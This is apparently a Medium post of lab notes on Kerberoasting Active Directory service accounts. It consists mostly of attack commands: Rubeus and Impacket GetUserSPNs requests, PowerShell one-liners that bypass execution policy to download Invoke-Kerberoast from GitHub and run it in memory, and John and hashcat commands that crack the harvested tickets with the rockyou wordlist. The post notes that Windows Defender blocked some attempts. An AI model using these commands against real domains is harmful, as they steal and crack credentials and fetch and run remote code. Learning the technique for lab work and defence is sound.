Kerberoasting Over an Open Fire

  • RSAT (nice to have, but not absolutely necessary)
  • BloodHound (also nice to have, but not absolutely necessary)
  • Redistributable 3.5
  • Visual Studio 2019 Community
  • Rubeus
  • John the Ripper
Set-ADUser -Identity Kerberoast.Honeypot -ServicePrincipalNames @{Add=’MySVC/corp.local’}
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
powershell -ep bypass -c “IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt”
$webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
Windows Defender does its job.
‘.\Rubeus.exe kerberoast /format:hashcat > Hash1’ 
Windows Defender does its job again.
./GetUserSPNs.py -request <domain>/<user> -dc-ip <IP> -outputfile <filename>john <filename> --format=krb5tgs --wordlist=<wordlist>
hashcat -m 13100 hashes.kerberoast rockyou.txt -force
hashcat -m 19700 hashes.kerberoast2 rockyou.txt -force

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.